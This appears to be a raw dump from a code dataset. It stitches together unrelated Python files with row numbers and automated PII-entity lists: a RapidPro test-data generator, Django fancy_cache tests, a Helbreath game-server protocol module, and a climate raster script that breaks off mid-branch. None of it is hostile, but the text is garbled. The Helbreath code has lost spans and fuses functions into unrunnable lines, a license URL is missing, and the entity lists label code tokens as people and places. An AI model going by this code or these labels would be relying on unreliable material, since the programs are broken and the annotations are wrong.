for index_batch in chunk_list(six.moves.xrange(num_contacts), self.batch_size):
batch = []
# generate flat representations and contact objects for this batch
for c_index in index_batch: # pragma: no cover
org = self.random_org(orgs)
name = self.random_choice(names)
location = self.random_choice(locations) if self.probability(CONTACT_HAS_FIELD_PROB) else None
created_on = self.timeline_date(c_index / num_contacts)
c = {
'org': org,
'user': org.cache['users'][0],
'name': name,
'groups': [],
'tel': '+2507%08d' % c_index if self.probability(CONTACT_HAS_TEL_PROB) else None,
'twitter': '%s%d' % (name.replace(' ', '_').lower() if name else 'tweep', c_index) if self.probability(CONTACT_HAS_TWITTER_PROB) else None,
'gender': self.random_choice(('M', 'F')) if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'age': self.random.randint(16, 80) if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'joined': self.random_date() if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'ward': location[0] if location else None,
'district': location[1] if location else None,
'state': location[2] if location else None,
'language': self.random_choice(CONTACT_LANGS),
'is_stopped': self.probability(CONTACT_IS_STOPPED_PROB),
'is_blocked': self.probability(CONTACT_IS_BLOCKED_PROB),
'is_active': self.probability(1 - CONTACT_IS_DELETED_PROB),
'created_on': created_on,
'modified_on': self.random_date(created_on, self.db_ends_on),
}
# work out which system groups this contact belongs to
if c['is_active']:
if not c['is_blocked'] and not c['is_stopped']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_ALL])
if c['is_blocked']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_BLOCKED])
if c['is_stopped']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_STOPPED])
# let each user group decide if it is taking this contact
for g in org.cache['groups']:
if g.member(c) if callable(g.member) else self.probability(g.member):
c['groups'].append(g)
# track changes to group counts
for g in c['groups']:
group_counts[g] += 1
batch.append(c)
self._create_contact_batch(batch)
self._log("" > Created batch %d of %d\n"" % (batch_num, max(num_contacts // self.batch_size, 1)))
batch_num += 1
# create group count records manually
counts = []
for group, count in group_counts.items():
counts.append(ContactGroupCount(group=group, count=count, is_squashed=True))
group.count = count
ContactGroupCount.objects.bulk_create(counts)
def _create_contact_batch(self, batch):
""""""
Bulk creates a batch of contacts from flat representations
""""""
for c in batch:
c['object'] = Contact(org=c['org'], name=c['name'], language=c['language'],
is_stopped=c['is_stopped'], is_blocked=c['is_blocked'],
is_active=c['is_active'],
created_by=c['user'], created_on=c['created_on'],
modified_by=c['user'], modified_on=c['modified_on'])
Contact.objects.bulk_create([c['object'] for c in batch])
# now that contacts have pks, bulk create the actual URN, value and group membership objects
batch_urns = []
batch_values = []
batch_memberships = []
for c in batch:
org = c['org']
c['urns'] = []
if c['tel']:
c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TEL_SCHEME,
path=c['tel'], identity=URN.from_tel(c['tel'])))
if c['twitter']:
c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TWITTER_SCHEME,
path=c['twitter'], identity=URN.from_twitter(c['twitter'])))
if c['gender']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['gender'],
string_value=c['gender']))
if c['age']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['age'],
string_value=str(c['age']), decimal_value=c['age']))
if c['joined']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['joined'],
string_value=datetime_to_str(c['joined']), datetime_value=c['joined']))
if c['ward']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['ward'],
string_value=c['ward'].name, location_value=c['ward']))
if c['district']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['district'],
string_value=c['district'].name, location_value=c['district']))
if c['state']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['state'],
string_value=c['state'].name, location_value=c['state']))
for g in c['groups']:
batch_memberships.append(ContactGroup.contacts.through(contact=c['object'], contactgroup=g))
batch_urns += c['urns']
ContactURN.objects.bulk_create(batch_urns)
Value.objects.bulk_create(batch_values)
ContactGroup.contacts.through.objects.bulk_create(batch_memberships)
def simulate_activity(self, orgs, num_runs):
self._log(""Starting simulation. Ctrl+C to cancel...\n"")
runs = 0
while runs < num_runs:
try:
with transaction.atomic():
# make sure every org has an active flow
for org in orgs:
if not org.cache['activity']:
self.start_flow_activity(org)
with transaction.atomic():
org = self.random_org(orgs)
if self.probability(0.1):
self.create_unsolicited_incoming(org)
else:
self.create_flow_run(org)
runs += 1
except KeyboardInterrupt:
self._log(""Shutting down...\n"")
break
squash_channelcounts()
squash_flowpathcounts()
squash_flowruncounts()
prune_recentmessages()
squash_topupcredits()
squash_labelcounts()
def start_flow_activity(self, org):
assert not org.cache['activity']
user = org.cache['users'][0]
flow = self.random_choice(org.cache['flows'])
if self.probability(0.9):
# start a random group using a flow start
group = self.random_choice(org.cache['groups'])
contacts_started = list(group.contacts.values_list('id', flat=True))
self._log("" > Starting flow %s for group %s (%d) in org %s\n""
% (flow.name, group.name, len(contacts_started), org.name))
start = FlowStart.create(flow, user, groups=[group], restart_participants=True)
start.start()
else:
# start a random individual without a flow start
if not org.cache['contacts']:
return
contact = Contact.objects.get(id=self.random_choice(org.cache['contacts']))
contacts_started = [contact.id]
self._log("" > Starting flow %s for contact #%d in org %s\n"" % (flow.name, contact.id, org.name))
flow.start([], [contact], restart_participants=True)
org.cache['activity'] = {'flow': flow, 'unresponded': contacts_started, 'started': list(contacts_started)}
def end_flow_activity(self, org):
self._log("" > Ending flow %s for in org %s\n"" % (org.cache['activity']['flow'].name, org.name))
org.cache['activity'] = None
runs = FlowRun.objects.filter(org=org, is_active=True)
FlowRun.bulk_exit(runs, FlowRun.EXIT_TYPE_EXPIRED)
def create_flow_run(self, org):
activity = org.cache['activity']
flow = activity['flow']
if activity['unresponded']:
contact_id = self.random_choice(activity['unresponded'])
activity['unresponded'].remove(contact_id)
contact = Contact.objects.get(id=contact_id)
urn = contact.urns.first()
if urn:
self._log("" > Receiving flow responses for flow %s in org %s\n"" % (flow.name, flow.org.name))
inputs = self.random_choice(flow.input_templates)
for text in inputs:
channel = flow.org.cache['channels'][0]
Msg.create_incoming(channel, six.text_type(urn), text)
# if more than 10% of contacts have responded, consider flow activity over
if len(activity['unresponded']) <= (len(activity['started']) * 0.9):
self.end_flow_activity(flow.org)
def create_unsolicited_incoming(self, org):
if not org.cache['contacts']:
return
self._log("" > Receiving unsolicited incoming message in org %s\n"" % org.name)
available_contacts = list(set(org.cache['contacts']) - set(org.cache['activity']['started']))
if available_contacts:
contact = Contact.objects.get(id=self.random_choice(available_contacts))
channel = self.random_choice(org.cache['channels'])
urn = contact.urns.first()
if urn:
text = ' '.join([self.random_choice(l) for l in INBOX_MESSAGES])
Msg.create_incoming(channel, six.text_type(urn), text)
def probability(self, prob):
return self.random.random() < prob
def random_choice(self, seq, bias=1.0):
if not seq:
raise ValueError(""Can't select random item from empty sequence"")
return seq[int(math.pow(self.random.random(), bias) * len(seq))]
def weighted_choice(self, seq, weights):
r = self.random.random() * sum(weights)
cum_weight = 0.0
for i, item in enumerate(seq):
cum_weight += weights[i]
if r < cum_weight or (i == len(seq) - 1):
return item
def random_org(self, orgs):
""""""
Returns a random org with bias toward the orgs with the lowest indexes
""""""
return self.random_choice(orgs, bias=self.org_bias)
def random_date(self, start=None, end=None):
if not end:
end = timezone.now()
if not start:
start = end - timedelta(days=365)
if start == end:
return end
return ms_to_datetime(self.random.randrange(datetime_to_ms(start), datetime_to_ms(end)))
def timeline_date(self, dist):
""""""
Converts a 0..1 distance into a date on this database's overall timeline
""""""
seconds_span = (self.db_ends_on - self.db_begins_on).total_seconds()
return self.db_begins_on + timedelta(seconds=(seconds_span * dist))
@staticmethod
def peak_memory():
rusage_denom = 1024
if sys.platform == 'darwin':
# OSX gives value in bytes, other OSes in kilobytes
rusage_denom *= rusage_denom
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom
def _log(self, text):
self.stdout.write(text, ending='')
self.stdout.flush()
class DisableTriggersOn(object):
""""""
Helper context manager for temporarily disabling database triggers for a given model
""""""
def __init__(self, *models):
self.tables = [m._meta.db_table for m in models]
def __enter__(self):
with connection.cursor() as cursor:
for table in self.tables:
cursor.execute('ALTER TABLE %s DISABLE TRIGGER ALL;' % table)
def __exit__(self, exc_type, exc_val, exc_tb):
with connection.cursor() as cursor:
for table in self.tables:
cursor.execute('ALTER TABLE %s ENABLE TRIGGER ALL;' % table)
",30703,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'django_redis'], ['LOCATION', 'URN'], ['LOCATION', 'ms_to_datetime'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'Chile'], ['LOCATION', 'Indonesia'], ['LOCATION', 'Rwanda'], ['LOCATION', 'Mexico'], ['LOCATION', 'Zambia'], ['LOCATION', 'India'], ['LOCATION', 'Brazil'], ['LOCATION', 'Sudan'], ['LOCATION', 'TYPE_ANDROID'], ['LOCATION', 'Faskari'], ['LOCATION', 'Zuru'], ['PERSON', 'Anka'], ['PERSON', ""c['district'].name""], ['PERSON', 'Anka'], ['PERSON', 'LABELS'], ['PERSON', 'jeb'], ['PERSON', 'Anne'], ['PERSON', 'Bob'], ['PERSON', 'Cathy'], ['PERSON', 'Dave'], ['PERSON', 'Evan'], ['PERSON', 'George'], ['PERSON', 'Igor'], ['PERSON', 'Jameson'], ['PERSON', 'Lopez'], ['PERSON', 'Mooney'], ['PERSON', 'Roberts'], ['NRP', 'CONTACT_HAS_TWITTER_PROB'], ['DATE_TIME', 'today'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'DISTRICT'], ['LOCATION', 'USER_PASSWORD'], ['NRP', ""org.cache['users'].append(user""], ['PERSON', 'len(CHANNELS'], ['PERSON', 'group.member'], ['PERSON', 'LABELS'], ['NRP', 'index_batch'], ['PERSON', 'tweep'], ['LOCATION', 'group.name'], ['PERSON', 'darwin'], ['DATE_TIME', 'RUSAGE_SELF).ru_maxrss / rusage_denom'], ['URL', 'https://github.com/joke2k/faker/issues/484#issuecomment-287931101'], ['URL', 'django.co'], ['URL', 'django.contrib.auth.mo'], ['URL', 'django.core.ma'], ['URL', 'django.core.management.ba'], ['URL', 'temba.channels.mo'], ['URL', 'temba.ch'], ['URL', 'temba.contacts.mo'], ['URL', 'temba.flows.mo'], ['URL', 'temba.locations.mo'], ['URL', 'temba.msgs.mo'], ['URL', 'temba.ms'], ['URL', 'temba.orgs.mo'], ['URL', 'temba.org'], ['URL', 'temba.values.mo'], ['URL', 'nigeria.bi'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'self.COM'], ['URL', 'self.pe'], ['URL', 'self.co'], ['URL', 'self.ba'], ['URL', 'timezone.no'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'email.com'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.co'], ['URL', 'Channel.CH'], ['URL', 'flow.in'], ['URL', 'flow.na'], ['URL', 'org.ca'], ['URL', 'org.ge'], ['URL', 'org.ch'], ['URL', 'ContactGroup.us'], ['URL', 'groups.fi'], ['URL', 'org.org'], ['URL', 'contacts.va'], ['URL', 'self.style.SU'], ['URL', 'self.si'], ['URL', 'self.random.ge'], ['URL', 'self.org'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'w.pa'], ['URL', 'w.parent.pa'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'self.style.SU'], ['URL', 'self.random.sh'], ['URL', 'self.random.ch'], ['URL', 'pytz.al'], ['URL', 'rapidpro.io'], ['URL', 'self.style.SU'], ['URL', 'org.in'], ['URL', 'org.ca'], ['URL', 'g.gr'], ['URL', 'ContactGroup.sy'], ['URL', 'groups.fi'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'org.id'], ['URL', 'org.id'], ['URL', 'user.se'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Channel.objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactField.objects.cr'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactGroup.cr'], ['URL', 'ContactGroup.us'], ['URL', 'groups.cr'], ['URL', 'group.me'], ['URL', 'group.co'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Label.la'], ['URL', 'objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'org.im'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Contact.ge'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'six.mo'], ['URL', 'self.ba'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'name.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'g.me'], ['URL', 'g.me'], ['URL', 'self.pro'], ['URL', 'g.me'], ['URL', 'self.ba'], ['URL', 'counts.it'], ['URL', 'group.co'], ['URL', 'URN.fr'], ['URL', 'URN.fr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'transaction.at'], ['URL', 'org.ca'], ['URL', 'self.st'], ['URL', 'transaction.at'], ['URL', 'self.pro'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'group.contacts.va'], ['URL', 'flow.na'], ['URL', 'group.na'], ['URL', 'org.na'], ['URL', 'FlowStart.cr'], ['URL', 'start.st'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.id'], ['URL', 'flow.na'], ['URL', 'contact.id'], ['URL', 'org.na'], ['URL', 'flow.st'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'FlowRun.objects.fi'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'contact.urns.fi'], ['URL', 'flow.na'], ['URL', 'flow.org.na'], ['URL', 'flow.in'], ['URL', 'flow.org.ca'], ['URL', 'Msg.cr'], ['URL', 'flow.org'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.urns.fi'], ['URL', 'Msg.cr'], ['URL', 'self.org'], ['URL', 'timezone.no'], ['URL', 'sys.pl'], ['URL', 'resource.ge'], ['URL', 'resource.RU'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'connection.cu'], ['URL', 'connection.cu']]"
87,"import unittest
import re
from nose.tools import eq_, ok_
from django.test.client import RequestFactory
from django.core.cache import cache
from fancy_cache.memory import find_urls
from . import views
class TestViews(unittest.TestCase):
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_render_home1(self):
request = self.factory.get('/anything')
response = views.home(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
# do it again
response = views.home(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
eq_(random_string_1, random_string_2)
def test_render_home2(self):
authenticated = RequestFactory(AUTH_USER='peter')
request = self.factory.get('/2')
response = views.home2(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
# do it again
response = views.home2(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
eq_(random_string_1, random_string_2)
# do it again, but with a hint to disable cache
request = authenticated.get('/2')
response = views.home2(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_(random_string_1 != random_string_2)
def test_render_home3(self):
request = self.factory.get('/anything')
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_('In your HTML' in response.content.decode(""utf8""))
extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0]
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0]
ok_('In your HTML' in response.content.decode(""utf8""))
eq_(random_string_1, random_string_2)
# the post_process_response is only called once
eq_(extra_random_1, extra_random_2)
def test_render_home3_no_cache(self):
factory = RequestFactory(AUTH_USER='peter')
request = factory.get('/3')
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
ok_('In your HTML' not in response.content.decode(""utf8""))
def test_render_home4(self):
request = self.factory.get('/4')
response = views.home4(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_('In your HTML' in response.content.decode(""utf8""))
extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0]
response = views.home4(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0]
ok_('In your HTML' in response.content.decode(""utf8""))
eq_(random_string_1, random_string_2)
# the post_process_response is now called every time
ok_(extra_random_1 != extra_random_2)
def test_render_home5(self):
request = self.factory.get('/4', {'foo': 'bar'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
request = self.factory.get('/4', {'foo': 'baz'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_(random_string_1 != random_string_2)
request = self.factory.get('/4', {'foo': 'baz', 'other': 'junk'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_3 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
eq_(random_string_2, random_string_3)
def test_render_home5bis(self):
request = self.factory.get('/4', {'foo': 'bar'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
request = self.factory.get('/4', {'foo': 'baz'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_(random_string_1 != random_string_2)
request = self.factory.get('/4', {'foo': 'baz', 'bar': 'foo'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_3 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
eq_(random_string_2, random_string_3)
def test_remember_stats_all_urls(self):
request = self.factory.get('/anything')
response = views.home6(request)
eq_(response.status_code, 200)
# now ask the memory thing
match, = find_urls(urls=['/anything'])
eq_(match[0], '/anything')
eq_(match[2]['hits'], 0)
eq_(match[2]['misses'], 1)
# second time
response = views.home6(request)
eq_(response.status_code, 200)
match, = find_urls(urls=['/anything'])
eq_(match[0], '/anything')
eq_(match[2]['hits'], 1)
eq_(match[2]['misses'], 1)
def test_remember_stats_all_urls_looong_url(self):
request = self.factory.get(
'PI:KEY'
'test/that/things/work/with/long/urls/too',
{
'line1': 'Bad luck, wind been blowing at my back',
'line2': ""I was born to bring trouble to wherever I'm at"",
'line3': ""Got the number thirteen, tattooed on my neck"",
'line4': ""When the ink starts to itch, "",
'line5': ""then the black will turn to red"",
}
)
response = views.home6(request)
eq_(response.status_code, 200)
# now ask the memory thing
match, = find_urls()
ok_(match[0].startswith('/something/really'))
eq_(match[2]['hits'], 0)
eq_(match[2]['misses'], 1)
# second time
response = views.home6(request)
eq_(response.status_code, 200)
match, = find_urls([])
ok_(match[0].startswith('/something/really'))
eq_(match[2]['hits'], 1)
eq_(match[2]['misses'], 1)
",7974,"[['LOCATION', 'TestCase'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['URL', 'self.factory.ge'], ['URL', 'self.factory.ge'], ['URL', 'nose.to'], ['URL', 'django.test.cl'], ['URL', 'django.core.ca'], ['URL', 'cache.me'], ['URL', 'cache.cl'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'authenticated.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st']]"
88,"#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# hb_balancer
# High performance load balancer between Helbreath World Servers.
#
# Copyright (C) 2012 Michał Papierski dummy@email.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see .
#
import struct
import random
import logging
from twisted.internet import reactor
from twisted.protocols.stateful import StatefulProtocol
from twisted.python import log
from packets import Packets
class BaseHelbreathProtocol(StatefulProtocol):
''' Basic Helbreath Protocol '''
def getInitialState(self):
'''
Protocol overview:
[Key unsigned byte] [Size unsigned short] [Data Size-bytes]
'''
return (self.get_key, 1)
def get_key(self, data):
''' Get key '''
self.key, = struct.unpack(' 0:
# Decode
data = list(data)
for i in range(len(data)):
data[i] = chr(((ord(data[i]) ^ (self.key ^ (self.data_size - 3 - i))) - (i ^ self.key)) % 256)
data = ''.join(data)
# Pass decoded data
self.raw_data(data)
return (self.get_key, 1)
def send_message(self, data):
''' Send a Helbreath Packet data '''
key = random.randint(0, 255)
if key > 0:
# Encode
data = list(data)
for i in range(len(data)):
data[i] = chr(((ord(data[i]) + (i ^ key)) ^ (key ^ (len(data) - i))) % 256)
data = ''.join(data)
self.transport.write(struct.pack('_MM_YYYY.tif'. If sorted using base
Pythons sort/sorted functions, things will be sorted by the first char
of the month, which makes thing go 1, 11, ... which sucks for timeseries
this sorts it properly following SNAP standards as the default settings.
ARGUMENTS:
----------
files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.
split_on = [str] `str` character to split the filename on. default:'_', SNAP standard.
elem_month = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-2. For SNAP standard.
elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-1. For SNAP standard.
RETURNS:
--------
sorted `list` by month and year ascending.
'''
import pandas as pd
months = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_month]) for fn in files ]
years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]
df = pd.DataFrame( {'fn':files, 'month':months, 'year':years} )
df_sorted = df.sort_values( ['year', 'month' ] )
return df_sorted.fn.tolist()
def only_years( files, begin=1901, end=2100, split_on='_', elem_year=-1 ):
'''
return new list of filenames where they are truncated to begin:end
ARGUMENTS:
----------
files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.
begin = [int] four digit integer year of the begin time default:1901
end = [int] four digit integer year of the end time default:2100
split_on = [str] `str` character to split the filename on. default:'_', SNAP standard.
elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-1. For SNAP standard.
RETURNS:
--------
sliced `list` to begin and end year.
'''
import pandas as pd
years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]
df = pd.DataFrame( { 'fn':files, 'year':years } )
df_slice = df[ (df.year >= begin ) & (df.year <= end ) ]
return df_slice.fn.tolist()
def masked_mean( fn, bounds=None ):
''' get mean of the full domain since the data are already clipped
mostly used for processing lots of files in parallel.'''
import numpy as np
import rasterio
with rasterio.open( fn ) as rst:
if bounds:
window = rst.window( *bounds )
else:
window = rst.window( *rst.bounds )
mask = (rst.read_masks( 1 ) == 0)
arr = np.ma.masked_array( rst.read( 1, window=window ), mask=mask )
return np.mean( arr )
if __name__ == '__main__':
import os, glob
import geopandas as gpd
import numpy as np
import xarray as xr
import matplotlib
matplotlib.use( 'agg' )
from matplotlib import pyplot as plt
from pathos.mp_map import mp_map
import pandas as pd
import geopandas as gpd
# args / set working dir
base_dir = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data'
os.chdir( base_dir )
# scenarios = ['rcp60', 'rcp85']
scenarios = ['historical']
shp_fn = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/SCTC_studyarea/Kenai_StudyArea.shp'
shp = gpd.read_file( shp_fn )
bounds = shp.bounds
# models = ['5ModelAvg','CRU_TS323','GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']
# models = ['GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']
models = ['ts323']
variables_list = [['pr']]# ['tasmax', 'tas', 'tasmin']]#,
# models = ['CRU_TS323']
# begin_end_groups = [[2016,2016],[2010,2020],[2095, 2100]]
begin_end_groups = [[1916, 1916],[1950, 1960],[1995, 2000]]
for scenario in scenarios:
for variables in variables_list:
for m in models:
for begin, end in begin_end_groups: # not fully wired-up yet
if m == 'ts323':
old_dir = 'PI:KEY'
# begin = 1950
# end = 1965
else:
if scenario == 'historical':
